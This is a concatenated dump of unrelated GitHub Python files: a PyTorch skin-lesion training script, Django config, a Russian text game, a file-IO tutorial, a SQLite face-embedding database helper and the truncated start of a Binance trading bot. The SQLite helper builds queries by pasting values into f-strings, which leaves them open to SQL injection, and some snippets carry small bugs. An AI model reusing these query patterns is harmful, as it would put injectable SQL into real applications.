auxiliary output\n # but in testing we only consider the final output.\n if is_inception and phase == 'train':\n # From https://discuss.pytorch.org/t/how-to-optimize-inception-model-with-auxiliary-classifiers/7958\n outputs, aux_outputs = model(inputs)\n loss1 = criterion(outputs, labels)\n loss2 = criterion(aux_outputs, labels)\n loss = loss1 + 0.4*loss2\n else:\n outputs = model(inputs)\n loss = criterion(outputs, labels)\n\n _, preds = torch.max(outputs, 1)\n\n # backward + optimize only if in training phase\n if phase == 'train':\n loss.backward()\n optimizer.step()\n\n # statistics\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n\n epoch_loss = running_loss / len(dataloaders[phase].dataset)\n epoch_acc = running_corrects.double() / len(dataloaders[phase].dataset)\n\n print('{} Loss: {:.4f} Acc: {:.4f}'.format(phase, epoch_loss, epoch_acc))\n\n # deep copy the model\n if phase == 'valid' and epoch_acc > best_acc:\n best_acc = epoch_acc\n best_model_wts = copy.deepcopy(model.state_dict())\n if phase == 'valid':\n val_acc_history.append(epoch_acc)\n\n print()\n\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))\n print('Best val Acc: {:4f}'.format(best_acc))\n\n # load best model weights\n model.load_state_dict(best_model_wts)\n return model, val_acc_history\n\n\n\n\ndef set_parameter_requires_grad(model, feature_extracting):\n if feature_extracting:\n for param in model.parameters():\n param.requires_grad = False\n\n\ndef initialize_model(model_name,checkpoint_path, num_classes, feature_extract):\n # Initialize these variables which will be set in this if statement. Each of these\n # variables is model specific.\n model_ft = None\n input_size = 0\n\n if model_name == \"resnet\":\n \"\"\" Resnet18\n \"\"\"\n model_ft = models.resnet18(pretrained=\"imagenet\")\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\n input_size = 224\n\n elif model_name == \"alexnet\":\n \"\"\" Alexnet\n \"\"\"\n model_ft = models.alexnet(pretrained=\"imagenet\")\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs,num_classes)\n input_size = 224\n\n elif model_name == \"vgg\":\n \"\"\" VGG11_bn\n \"\"\"\n model_ft = models.vgg11_bn(pretrained=\"imagenet\")\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs,num_classes)\n input_size = 224\n\n elif model_name == \"squeezenet\":\n \"\"\" Squeezenet\n \"\"\"\n model_ft = models.squeezenet1_0(pretrained=\"imagenet\")\n set_parameter_requires_grad(model_ft, feature_extract)\n model_ft.classifier[1] = nn.Conv2d(512, num_classes, kernel_size=(1,1), stride=(1,1))\n model_ft.num_classes = num_classes\n input_size = 224\n\n elif model_name == \"densenet\":\n \"\"\" Densenet\n \"\"\"\n model_ft = models.densenet121(pretrained=\"imagenet\")\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, num_classes)\n input_size = 224\n\n elif model_name == \"inception\":\n \"\"\" Inception v3\n Be careful, expects (299,299) sized images and has auxiliary output\n \"\"\"\n model_ft = models.inception_v3(pretrained=\"imagenet\")\n set_parameter_requires_grad(model_ft, feature_extract)\n # Handle the auxilary net\n num_ftrs = model_ft.AuxLogits.fc.in_features\n model_ft.AuxLogits.fc = nn.Linear(num_ftrs, num_classes)\n # Handle the primary net\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs,num_classes)\n input_size = 299\n\n else:\n print(\"Invalid model name, exiting...\")\n exit()\n\n chpt = torch.load(checkpoint_path)\n model_ft.class_to_idx = chpt['class_to_idx']\n model_ft.load_state_dict(chpt['state_dict'])\n\n return model_ft, input_size\n\n\n\n\n######################################################################\nif __name__ == '__main__':\n\n input_shape = 299\n mean = [0.5, 0.5, 0.5]\n std = [0.5, 0.5, 0.5]\n scale = 360\n input_shape = 299\n learning_rate = 0.0005\n data_dir = \"C://Users//Sahan//ipthw//dermatologist-ai//data\"\n model_name = \"inception\"\n num_classes = 3\n batch_size = 64\n num_epochs = 30\n feature_extract = True\n\n\n\n\n data_transforms = {\n 'train': transforms.Compose([\n transforms.Resize(scale),\n transforms.RandomResizedCrop(input_shape),\n transforms.RandomHorizontalFlip(),\n transforms.RandomVerticalFlip(),\n transforms.RandomRotation(degrees=90),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)]),\n 'valid': transforms.Compose([\n transforms.Resize(scale),\n transforms.CenterCrop(input_shape),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)]),\n 'test': transforms.Compose([\n transforms.Resize(scale),\n transforms.CenterCrop(input_shape),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)]),}\n\n print(\"Initializing Datasets and Dataloaders...\")\n\n# Create training and validation datasets\n image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'valid']}\n# Create training and validation dataloaders\n dataloaders_dict = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle=True, num_workers=4) for x in ['train', 'valid']}\n\n# Detect if we have a GPU available\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n\n######################################################################\n\n model_ft, input_size = initialize_model(model_name, 'inception_save.pth.tar', num_classes,feature_extract = True)\n\n params_to_update = model_ft.parameters()\n print(\"Params to learn:\")\n if feature_extract:\n params_to_update = []\n for name,param in model_ft.named_parameters():\n if param.requires_grad == True:\n params_to_update.append(param)\n print(\"\\t\",name)\n else:\n for name,param in model_ft.named_parameters():\n if param.requires_grad == True:\n print(\"\\t\",name)\n\n\n\n\n model_ft = model_ft.to(device)\n\n\n criterion = nn.CrossEntropyLoss()\n\n model_ft, hist = train_model(model_ft, dataloaders_dict, criterion, learning_rate, num_epochs=num_epochs, is_inception=(model_name==\"inception\"))\n\n model_ft.class_to_idx = image_datasets['train'].class_to_idx\n checkpoint = {\n 'arch': 'inception_v3',\n 'class_to_idx': model_ft.class_to_idx,\n 'state_dict': model_ft.state_dict()}\n\n torch.save(checkpoint, 'inception_save.pth.tar')\n","repo_name":"sahand68/Skin_cancer_Detection","sub_path":"inception_model.py","file_name":"inception_model.py","file_ext":"py","file_size_in_byte":9546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23040601894","text":"from django.contrib import admin\nfrom django.urls import path, include, re_path\n\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Documentacion de la API\",\n default_version='v1',\n description=\"Documentacion de E-comerce\",\n terms_of_service=\"https://www.google.com/policies/terms/\",\n contact=openapi.Contact(email=\"leonardoberoes94@gmail.com\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('characters/', include('characters.api.routers')),\n path('movies/', include('movies.api.routers')),\n re_path(r'^swagger(?P<format>\\.json|\\.yaml)$', schema_view.without_ui(cache_timeout=0), name='schema-json'),\n re_path(r'^swagger/$', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n re_path(r'^redoc/$', schema_view.with_ui('redoc', cache_timeout=0), name='schema-redoc'),\n\n]\n","repo_name":"leo98ber/star_wars_api","sub_path":"star_wars_characters_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35422585707","text":"import time\nplay = True\ndoor = 0\nprint(\"Игра началась!\")\nprint(\"Перед вами 10 дверей\")\nwhile play:\n print(\"Выберите дверь\")\n if door == 0:\n try:\n door = int(input())\n except ValueError as e:\n print(\"Выберите дверь\")\n if door == 1:\n print(\"За дверью была пустая комната\")\n time.sleep(3)\n door = 0\n if door == 2:\n print(\"За дверью были сокровища! Вы их забирате\")\n time.sleep(3)\n door = 0\n if door == 3:\n print(\"За дверью был огромн��й паук!\\n\"\n \"Вы умираете\")\n time.sleep(2)\n print(\"Игра окончена\")\n play = False\n if door == 4:\n print(\"Вы увидели призрака и он вселился в вас и спрыгнул с крыши\\n\"\n \"Вы умираете\")\n time.sleep(2)\n print(\"Игра окончена\")\n play = False\n if door == 5:\n print(\"Вы нашли комнату в которой стоит фонтан (зачем не понятно)\\nВы попили из него воды(странно но ничего не произошло)\")\n door = 0\n if door == 6:\n print(\"За дверью была пустая комната\")\n time.sleep(3)\n door = 0\n if door == 7:\n print(\"Вы находите выход из этого страшного дома\\n\"\n \"Вы выиграли!\")\n time.sleep(3)\n door = 0\n play = False\n if door == 8:\n print(\"В комнате вы замечаете скелета лежащего на полу, пугаетесь и убегаете\")\n time.sleep(2)\n door = 0\n if door == 9:\n print(\"Вы открываете дверь и в вас прилетает ядовитая стрела\\n\"\n \"Вы умираете\")\n time.sleep(2)\n play = False\n if door == 10:\n print(\"Вы находите огромнейшие запасы еды\\n\"\n \"Через 20 минут вы обжираетесь и помираете\\n\"\n \"Вы умираете\")\n time.sleep(2)\n play = False\n","repo_name":"Axeleron7/GhostGame","sub_path":"Game/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11423912150","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('reminders', '0009_auto_20150713_2104'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='task',\n name='is_completed',\n field=models.BooleanField(verbose_name='Completed', default=True),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='task',\n name='date_end',\n field=models.DateTimeField(verbose_name='Target Date of Completion'),\n ),\n ]\n","repo_name":"Lhwhatever/cep2015sem2","sub_path":"reminders/migrations/0010_auto_20150714_1755.py","file_name":"0010_auto_20150714_1755.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2068086771","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 28 18:01:32 2016\n\n@author: T800GHB\nThis file will show how to do some basic operation about file.\nThe recommend model to do IO operation is that use 'with' keyword\n\"\"\"\n\n\ndef run_demo():\n \"\"\"\n Open a file with readonly model.\n If the file does not exist, it will raise an IOerror.\n when we don't want to use this file anymore, close it, otherwise\n this part of system resource will not release.\n \"\"\"\n try:\n f1 = open('filepath/filename', 'r')\n f1.read()\n finally:\n if f1:\n f1.close()\n \"\"\"\n Use with keyword and open a file same like above block,\n and you don't need to call close function.\n \"\"\"\n with open('filepath/filename','r') as f2: \n \"\"\"\n Read all of file, and store it at fp.\n When the file is close, it also exist.\n If open a file with 'r+' model, then the file can be wirte\n \"\"\"\n fp1 = f2.read()\n #Read the specific size of file.\n fp2 = f2.read(1)\n #Read a line in this file.\n fp3 = f2.readline()\n \"\"\"\n Read all of the lines in this file and return as list. \n fp3 is a list contain all line.\n \"\"\"\n fp4 = f2.readlines()\n \n with open('filepath/filename.bmp', 'rb') as f3:\n \"\"\"\n Read a binary file and stroe it at local memory\n \"\"\"\n bitmap = f3.read()\n \n with open('filepath/filename.txt','r',encoding = 'gbk', error ='ignore') as f4:\n \"\"\"\n Read a text file that encoding type is not UTF-8, and ignore all \n error when the read procedure encounter some illegal character\n \"\"\"\n text = f4.read()\n \n with open('filepath/filename.txt', 'w') as f5:\n \"\"\"\n Write some content into file.\n \"\"\"\n f5.write('Hello my mind')\n #Make the pointer loacate to the head of file\n f5.seek(0)\n \n with open('filepath/filename.txt', 'a') as f6:\n \"\"\"\n Write some content to the rear of file, that means append it on rear.\n If you open a existed file on 'w' model, system will clear the file\n and write something what you want.\n If you want to make sure whether the file has existed, you should us\n os.path.isfile('filename') to confirm.\n \"\"\"\n f6.write('Hello again')\n \n str_list = ['hello','new','baby'] \n with open('filepath/filename.txt', 'w') as f7:\n '''\n Write a list of string into a file.\n Writelines can make sure every string in list as one line in file\n '''\n f7.writelines(str_list)\n \n \n \n \n \n","repo_name":"T800GHB/Python_Basic","sub_path":"basic_io/file_io.py","file_name":"file_io.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11033157434","text":"import sqlite3\nimport time\nfrom datetime import datetime\nimport pandas as pd\nimport numpy as np\nimport yaml\nimport os\nimport create_database\n\n# get configuration file's information\nconfig = yaml.load(open('config.yaml'), Loader=yaml.SafeLoader)\n\n\ndef convert_to_binary_data(filename):\n \"\"\"\n Convert image to save in DB(for image)\n :param filename:\n :return:\n \"\"\"\n # time_start = datetime.now()\n with open(filename, 'rb') as file:\n blob_data = file.read()\n # time_stop = datetime.now()\n # count_time = (time_stop - time_start)\n # total_seconds = count_time.total_seconds()\n # print(\"[INFO]-- Cost time to convert image\", total_seconds)\n return blob_data\n\n\ndef list_to_string(input_list):\n \"\"\"\n Convert list to string(for bbox)\n :param input_list:\n :return:\n \"\"\"\n str_result = ' '.join([str(elem) for elem in input_list])\n return str_result\n\n\ndef compare_features(feature, all_features):\n \"\"\"\n Compare feature vector to get the most similarity vector\n :param feature:\n :param all_features:\n :return:\n \"\"\"\n sims = np.dot(all_features, feature)\n pare_index = np.argmax(sims)\n score = sims[pare_index]\n return score, pare_index\n\n\n# connect to database\nconn = sqlite3.connect(config[\"database_name\"]+\".db\")\nc = conn.cursor()\n\n\ndef insert_db(data, table_name):\n \"\"\"\n Insert data into DB\n :param data:\n :param table_name:\n :return:\n \"\"\"\n global conn\n global c\n\n try:\n time_start = datetime.now()\n data_form_add = pd.DataFrame.from_dict(data)\n data_form_add.to_sql(table_name, conn, if_exists='append', index=False)\n conn.commit()\n time_stop = datetime.now()\n count_time = (time_stop - time_start)\n total_seconds = count_time.total_seconds()\n print(\"Cost time to insert Data to\", table_name, \"table: \", total_seconds, \"s\")\n except sqlite3.Error as error:\n print(\"Failed to insert Data into\", table_name, \"table because of error: \", error)\n\n\ndef delete_by_uuid(uuid_, table_name_):\n \"\"\"\n Using to delete one user(usually spot user) based on its uuid\n :param table_name_:\n :param uuid_:\n :return:\n \"\"\"\n global conn\n global c\n\n try:\n delete_query = f\"DELETE FROM '{table_name_}' WHERE uuid = '{uuid_}'\"\n c.execute(delete_query)\n conn.commit()\n print(\"Deleted uuid \", uuid_,\"at table\", table_name_, \" - DONE\")\n except sqlite3.Error as error:\n print(\"Failed to Deleted uuid \", uuid_,\"at table\", table_name_, \"because of error: \", error)\n\n\ndef delete_multiple_uuids(list_uuids, table_name):\n \"\"\"\n Using to delete multiple users based on a list of uuids\n :param table_name:\n :param list_uuids:\n :return:\n \"\"\"\n global conn\n global c\n\n try:\n list_of_ques = \", \".join(\"?\" * len(list_uuids))\n delete_multiple_query = f\"DELETE FROM '{table_name}' WHERE uuid IN ({list_of_ques})\"\n c.execute(delete_multiple_query, list_uuids)\n conn.commit()\n print(\"Deleted multiple uuids \", list_uuids, \" - DONE\")\n except sqlite3.Error as error:\n print(\"Failed to Deleted uuid \", list_uuids, \"at table\", table_name, \"because of error: \", error)\n\n\ndef query_all_vectors_for_matching(masked=1):\n \"\"\"\n Query all feature vectors of all users(uuids) from database based on masked value\n :param masked:\n :return:\n \"\"\"\n global conn\n global c\n\n try:\n query_all_feature_vectors = f\"SELECT * FROM EMBEDDINGS WHERE masked_face = '{masked}'\"\n time_start = datetime.now()\n c.execute(query_all_feature_vectors)\n return_all_feature_vector = c.fetchall()\n time_stop = datetime.now()\n count_time = (time_stop-time_start)\n total_seconds = count_time.total_seconds()\n print(\"Cost time for all feature vectors from DB: \", total_seconds, \"s\")\n conn.commit()\n return return_all_feature_vector\n except sqlite3.Error as error:\n print(\"Failed to query all vectors for matching because of error: \", error)\n return None\n\n\ndef query_vectors_by_uuid(uuid, masked_st):\n \"\"\"\n Query all feature vectors by uuids and masked_st(to check for updating vector)\n :param masked_st:\n :param uuid:\n :return:\n \"\"\"\n global conn\n global c\n\n try:\n query_vectors_uuid = f\"SELECT * FROM EMBEDDINGS WHERE uuid = '{uuid}' and masked_face = '{masked_st}'\"\n time_start = datetime.now()\n c.execute(query_vectors_uuid)\n return_all_vectors = c.fetchall()\n time_stop = datetime.now()\n count_time = (time_stop - time_start)\n total_seconds = count_time.total_seconds()\n print(\"Cost time for querying feature vectors of \", uuid, \"from DB: \", total_seconds, \"s\")\n conn.commit()\n return return_all_vectors\n except sqlite3.Error as error:\n print(\"Failed to query feature vectors of \", uuid, \"from DB because of error: \", error)\n return None\n\n\ndef update_oldest_vector(uuid_, new_vector):\n \"\"\"\n Update oldest vector by new vector at specific uuid\n :param uuid_:\n :param new_vector:\n :return:\n \"\"\"\n global conn\n global c\n\n try:\n update_query = f\"UPDATE EMBEDDINGS SET feature_vector = '{new_vector}', updated_at = '{str(datetime.now())}' \" \\\n f\"WHERE uuid = '{uuid_}' AND updated_at = (SELECT updated_at FROM EMBEDDINGS \" \\\n f\"WHERE uuid = '{uuid_}' ORDER BY updated_at ASC LIMIT 1)\"\n c.execute(update_query)\n conn.commit()\n print(\"Update oldest vector for uuid: \", uuid_, \" -DONE\")\n except sqlite3.Error as error:\n print(\"Failed to update vector for: \", uuid_, \"because of error: \", error)\n return None\n\n\ndef update_regis_status(uuid_, regis_infor):\n global conn\n global c\n\n try:\n update_value = 1\n update_regis_query = f\"UPDATE UUIDS SET '{regis_infor}' = '{update_value}', \" \\\n f\"updated_at = '{str(datetime.now())}' WHERE uuid = '{uuid_}' \"\n c.execute(update_regis_query)\n conn.commit()\n print(\"Update oldest vector for uuid: \", uuid_, \" -DONE\")\n except sqlite3.Error as error:\n print(\"Failed to update register masked face status for: \", uuid_, \"because of error: \", error)\n\n\ndef query_five_latest_vectors_for_matching():\n \"\"\"\n Query all feature vectors of all users(uuids) from database based on masked value\n :return: query results\n \"\"\"\n global conn\n global c\n\n try:\n uuid_list = [\"uuid0\", \"uuid1\", \"uuid2\"]\n query_all_feature_vectors = \"SELECT uuid, updated_at FROM EMBEDDINGS WHERE uuid in (SELECT uuid FROM UUIDS) \" \\\n \"ORDER BY updated_at ASC LIMIT 5\"\n # query_all_feature_vectors = \"SELECT uuid FROM UUIDS\"\n\n # query_ex = \"SELECT * FROM( SELECT * FROM BOOK, AUTHOR WHERE BOOK.AUTHORID = AUTHOR.AUTHORID) T1 \" \\\n # \"WHERE T1.BOOKID IN( SELECT T2.BOOKID FROM BOOK T2 WHERE T2.AUTHORID = T1.AUTHORID ORDER \" \\\n # \"BY T2.BOOKTITLE LIMIT 2 ) ORDER BY T1.BOOKTITLE\"\n time_start = datetime.now()\n c.execute(query_all_feature_vectors)\n return_all_feature_vector = c.fetchall()\n time_stop = datetime.now()\n count_time = (time_stop - time_start)\n total_seconds = count_time.total_seconds()\n print(\"Cost time for all feature vectors from DB: \", total_seconds, \"s\")\n conn.commit()\n return return_all_feature_vector\n except sqlite3.Error as error:\n print(\"Failed to query all vectors for matching because of error: \", error)\n return None\n\n\ndef query_from_db_test(name_of_table):\n \"\"\"\n Query all feature vector from database based on masked value FOR TESTING\n :param name_of_table:\n :return:\n \"\"\"\n global conn\n global c\n\n select_all_query = f\"SELECT * FROM '{name_of_table}'\"\n time_start = datetime.now()\n c.execute(select_all_query)\n result_select_all = c.fetchall()\n time_stop = datetime.now()\n count_time = (time_stop-time_start)\n total_seconds = count_time.total_seconds()\n print(\"[INFO]-- Cost time for query data from local database\", total_seconds)\n conn.commit()\n return result_select_all\n\n\ndef get_uuid_data_form(uuid_, name_, age_, gender_, level_, master_user_):\n \"\"\"\n Convert uuid_data to form to insert into DB\n :param uuid_:\n :param name_:\n :param age_:\n :param gender_:\n :param level_:\n :param master_user_:\n :return:\n \"\"\"\n uuid_data_form = {\n \"uuid\": [uuid_],\n \"name\": [name_],\n \"age\": [age_],\n \"gender\": [gender_],\n \"level\": [level_],\n \"master_user\": [master_user_],\n \"regis_masked\": 0,\n \"regis_non_masked\": 0,\n \"updated_at\": [str(datetime.now())],\n \"created_at\": [str(datetime.now())]\n }\n return uuid_data_form\n\n\ndef get_embeddings_data_form(uuid_, feature_vector_, masked_face_, iamge_, bbox_):\n \"\"\"\n Convert embeddings_data to form to insert into DB\n :param uuid_:\n :param feature_vector_:\n :param masked_face_:\n :param iamge_:\n :param bbox_:\n :return:\n \"\"\"\n converted_feature_vector = feature_vector_.tostring()\n converted_image = convert_to_binary_data(iamge_)\n\n embeddings_data_form = {\n \"uuid\": [uuid_],\n \"feature_vector\": [converted_feature_vector],\n \"masked_face\": [masked_face_],\n \"image\": [converted_image],\n \"bbox_tlx\": [bbox_[0]],\n \"bbox_tly\": [bbox_[1]],\n \"bbox_brx\": [bbox_[2]],\n \"bbox_bry\": [bbox_[3]],\n \"updated_at\": [str(datetime.now())],\n \"created_at\": [str(datetime.now())]\n }\n\n return embeddings_data_form\n\n\ndef get_checkin_data_form(uuid_, checkin_image_, checkin_vector_, checkin_bbox_, checkin_masked_):\n \"\"\"\n Convert checkin_data to form to insert into DB\n :param uuid_:\n :param checkin_image_:\n :param checkin_vector_:\n :param checkin_bbox_:\n :param checkin_masked_:\n :return: formed checkin_data\n \"\"\"\n converted_checkin_image = convert_to_binary_data(checkin_image_)\n converted_feature_vector = checkin_vector_.tostring()\n\n checkin_data_form = {\n \"uuid\": [uuid_],\n \"checkin_time\": [str(datetime.now())],\n \"checkin_image\": [converted_checkin_image],\n \"checkin_vector\": [converted_feature_vector],\n \"checkin_bbox_tlx\": [checkin_bbox_[0]],\n \"checkin_bbox_tly\": [checkin_bbox_[1]],\n \"checkin_bbox_brx\": [checkin_bbox_[2]],\n \"checkin_bbox_bry\": [checkin_bbox_[3]],\n \"checkin_masked\": [checkin_masked_],\n }\n\n return checkin_data_form\n\n\nif __name__ == \"__main__\":\n if not os.path.exists(config[\"database_name\"]+\".db\"):\n create_database.final_create_db()\n\n number_uuid = 3\n uuid_data_ = {\n \"uuid\": [\"uuid\"+str(i) for i in range(number_uuid)],\n \"name\": [\"name_0\" for i in range(number_uuid)],\n \"age\": [i+20 for i in range(number_uuid)],\n \"gender\": ['male' for _ in range(number_uuid)],\n \"level\": [1 for _ in range(number_uuid)],\n \"master_user\": [1 for _ in range(number_uuid)],\n \"regis_masked\": [0 for _ in range(number_uuid)],\n \"regis_non_masked\": [0 for _ in range(number_uuid)],\n \"updated_at\": [str(datetime.now()) for _ in range(number_uuid)],\n \"created_at\": [str(datetime.now()) for _ in range(number_uuid)]\n }\n\n # insert_db(uuid_data_, \"UUIDS\")\n result_ = query_from_db_test(\"UUIDS\")\n # print(\"result: \", len(result_))\n result_ = [result_[i][0] for i in range(len(result_))]\n print(\"uuid table result: \", result_)\n\n image_path = \"./avatar.jpg\"\n bbox_ = [1, 2, 3, 4]\n num_embed = 7\n list_of_uuid = [str(\"uuid\"+str(i)) for i in range(3)]\n\n # for uuid__ in list_of_uuid:\n # embeddings_data_ = {\n # \"uuid\": [uuid__ for _ in range(num_embed)],\n # \"feature_vector\": [np.random.rand(512).tostring() for _ in range(num_embed)],\n # \"masked_face\": [1 for _ in range(num_embed)],\n # \"image\": [convert_to_binary_data(image_path) for _ in range(num_embed)],\n # \"bbox_tlx\": [bbox_[0] for _ in range(num_embed)],\n # \"bbox_tly\": [bbox_[1] for _ in range(num_embed)],\n # \"bbox_brx\": [bbox_[2] for _ in range(num_embed)],\n # \"bbox_bry\": [bbox_[3] for _ in range(num_embed)],\n # \"updated_at\": [str(datetime.now()) for _ in range(num_embed)],\n # \"created_at\": [str(datetime.now()) for _ in range(num_embed)]\n # }\n #\n # insert_db(embeddings_data_, \"EMBEDDINGS\")\n\n result_e = query_from_db_test(\"EMBEDDINGS\")\n print(len(result_e[0]))\n result_uuid = [result_e[i][0] for i in range(len(result_e))]\n print(\"embeddings table result: \", result_uuid, len(result_uuid))\n\n result_time = [result_e[i][8] for i in range(len(result_e))]\n print(\"embeddings table result - time: \", result_time, len(result_time))\n\n query_5_result = query_five_latest_vectors_for_matching()\n print(query_5_result)\n\n # checkin_image_path = \"./avatar.jpg\"\n # checkin_number = 10\n # checkin_bbox_ = [5, 6, 7, 8]\n # checkin_data_ = {\n # \"uuid\": [\"uuid_2\" for i in range(checkin_number)],\n # \"checkin_time\": [str(datetime.now()) for _ in range(checkin_number)],\n # \"checkin_image\": [convert_to_binary_data(checkin_image_path) for _ in range(checkin_number)],\n # \"checkin_vector\": [np.random.rand(512).tostring() for _ in range(checkin_number)],\n # \"checkin_bbox_tlx\": [checkin_bbox_[0] for _ in range(checkin_number)],\n # \"checkin_bbox_tly\": [checkin_bbox_[1] for _ in range(checkin_number)],\n # \"checkin_bbox_brx\": [checkin_bbox_[2] for _ in range(checkin_number)],\n # \"checkin_bbox_bry\": [checkin_bbox_[3] for _ in range(checkin_number)],\n # \"checkin_masked\": [1 for _ in range(checkin_number)],\n # }\n\n # result_vector = query_from_db_test()\n # # print(\"All vectors: \", result_vector, len(result_vector))\n # final_result = [result_vector[i][0] for i in range(len(result_vector))]\n # print(\"before result: \", final_result)\n #\n # # uuid_in = \"uuid_0\"\n # # delete_uuid(uuid_in)\n #\n # list_of_uuids = [\"uuid_0\"]\n # delete_multiple_uuid(list_of_uuids)\n #\n # result_vector = query_from_db_test()\n # # print(\"All vectors: \", result_vector, len(result_vector))\n # final_result = [result_vector[i][0] for i in range(len(result_vector))]\n # print(\"after result: \", final_result)\n","repo_name":"MinhDung0803/sql-test-flabor","sub_path":"sqlite/sqlite_test.py","file_name":"sqlite_test.py","file_ext":"py","file_size_in_byte":14587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73306276967","text":"#!/usr/bin/python3\n\nweekdays = [\n \"monday\",\n \"tuesday\",\n \"wednesday\",\n \"thursday\",\n \"friday\",\n \"saturday\",\n \"sunday\"\n]\n\nnum = int(input(\"Give number of the day: \"))\nif num > 0 and num < 8:\n num = num - 1\n print(f\"day is {weekdays[num]}\")\n","repo_name":"kosvi/Centria_Python","sub_path":"w3/e2.py","file_name":"e2.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21451968535","text":"from common.tree_node import TreeNode\n\nclass Solution:\n def longestConsecutive(self, root: Optional[TreeNode]) -> int:\n self.ans: int = -float('inf')\n self.dfs(root, 1)\n return self.ans\n\n def dfs(self, node: 'TreeNode', path: int) -> None:\n self.ans = max(self.ans, path)\n if node.left:\n if node.left.val == node.val + 1:\n self.dfs(node.left, path+1)\n else:\n self.dfs(node.left, 1)\n if node.right:\n if node.right.val == node.val + 1:\n self.dfs(node.right, path+1)\n else:\n self.dfs(node.right, 1)\n ","repo_name":"jerrt2003/leetcode-in-python","sub_path":"298_Binary_Tree_Longest_Consecutive_Sequence/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15534746009","text":"import os\nfrom os.path import join, dirname \nfrom time import sleep\nfrom dotenv import load_dotenv\nimport schedule\nimport sys\nimport threading\nfrom binance.enums import *\nfrom binance.exceptions import BinanceAPIException\nimport datetime\nimport numpy as np\nimport decimal\n\n\n#.envファイルにAPIのKey及びSecretを保存しています。\n#.env_templateの書き方を参考にして.envファイルを作成し、main.pyと同じ場所に保存して使用します。\nload_dotenv(verbose=True)\ndotenv_path = join(dirname(__file__), '.env')\nload_dotenv(dotenv_path)\n\n#APIKEYとSECRETを変数に入れます\napi_key = os.environ.get(\"KEY\")\napi_secret = os.environ.get(\"SECRET\")\n\nfrom binance import Client, ThreadedWebsocketManager, ThreadedDepthCacheManager\nclient = Client(api_key, api_secret) # clientの作成\n\n\n\n\n\n\n\n# 3.注文キューの受付をする\n# \t- 注文条件 : 過去10分の最安値で買、最高値で売のストップリミット注文\n# \t- 注文方法 : 指値注文\n# \t- 通貨ペア : TUSD/BUSD\n# \t- 注文数量 : ウォレット内の資産の50%(通貨ペアの注文に使用できる資産のみ考慮 レバレッジは1倍を想定 ポジションの損益を考慮しない)\n\n\n\n\n\ndef info():\n \n\n\t# - ウォレット残高\n account_info = client.get_account_snapshot(type='SPOT')\n total_asset_of_Btc = account_info['snapshotVos'][0]['data']['totalAssetOfBtc']\n print('ウォレット残高')\n print(f'ウォレット残高(Btc):{total_asset_of_Btc}')\n # どのくらいBNBの残高\n bnb_balance = client.get_asset_balance(asset='BNB')\n print(f'BNB残高:{bnb_balance}')\n\n\n\n\t# - 損益\n print('損益')\n\t# - 自分が持つポジションや通貨情報\n [print(x) for x in account_info['snapshotVos'][0]['data']['balances']]\n\n\n\n\ntimes = 10\n\ndef order():\n\n\n order_symbol='TUSDBUSD'\n\n order_side=SIDE_BUY\n order_type=ORDER_TYPE_TAKE_PROFIT_LIMIT\n order_timeInForce=TIME_IN_FORCE_GTC\n order_quantity = '10.00000000' #後に上書きされる\n order_price='1.00000' #後に上書きされる\n order_stopprice = '1.00000' #後に上書きされる\n\n revorder_side=SIDE_SELL\n revorder_type=ORDER_TYPE_TAKE_PROFIT_LIMIT\n revorder_timeInForce=TIME_IN_FORCE_GTC\n revorder_quantity = '10.00000000' #後に上書きされる\n revorder_price='1.00000' #後に上書きされる\n revorder_stopprice = '1.00000' #後に上書きされる\n\n chk_order = client.get_open_orders(symbol=order_symbol)\n\n 